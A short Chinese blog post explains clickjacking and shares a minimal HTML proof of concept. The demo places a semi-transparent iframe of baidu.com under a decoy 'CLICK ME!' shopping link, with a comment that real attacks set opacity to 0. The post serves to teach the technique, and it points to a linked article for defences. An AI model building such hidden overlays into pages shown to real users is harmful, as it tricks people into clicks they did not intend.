Clickjacking是web攻击的一种,具体可参考 http://drops.wooyun.org/papers/104
具体怎么实施一直没弄明白,因缘际会看到了一个实际的例子,实际上受益匪浅,拿出来共享一下。(代码就不解释了,解决方案也可以参考上面的链接)
<html> </head> <body> <style> iframe { width:800px; height:800px; position:absolute; top:0; left:0; filter:alpha(opacity=30); /* in real life opacity=0 */ opacity:0.5; } </style> <div>Click on the link to go shopping now:</div> <iframe src="http://www.baidu.com"></iframe> <strong><a href="http://www.bing.com/" target="_blank" height=200px style="position:relative;left:380px;top:140px; z-index:999">CLICK ME!</a></<strong> <div>Buy! Buy! Buy!</div> </html>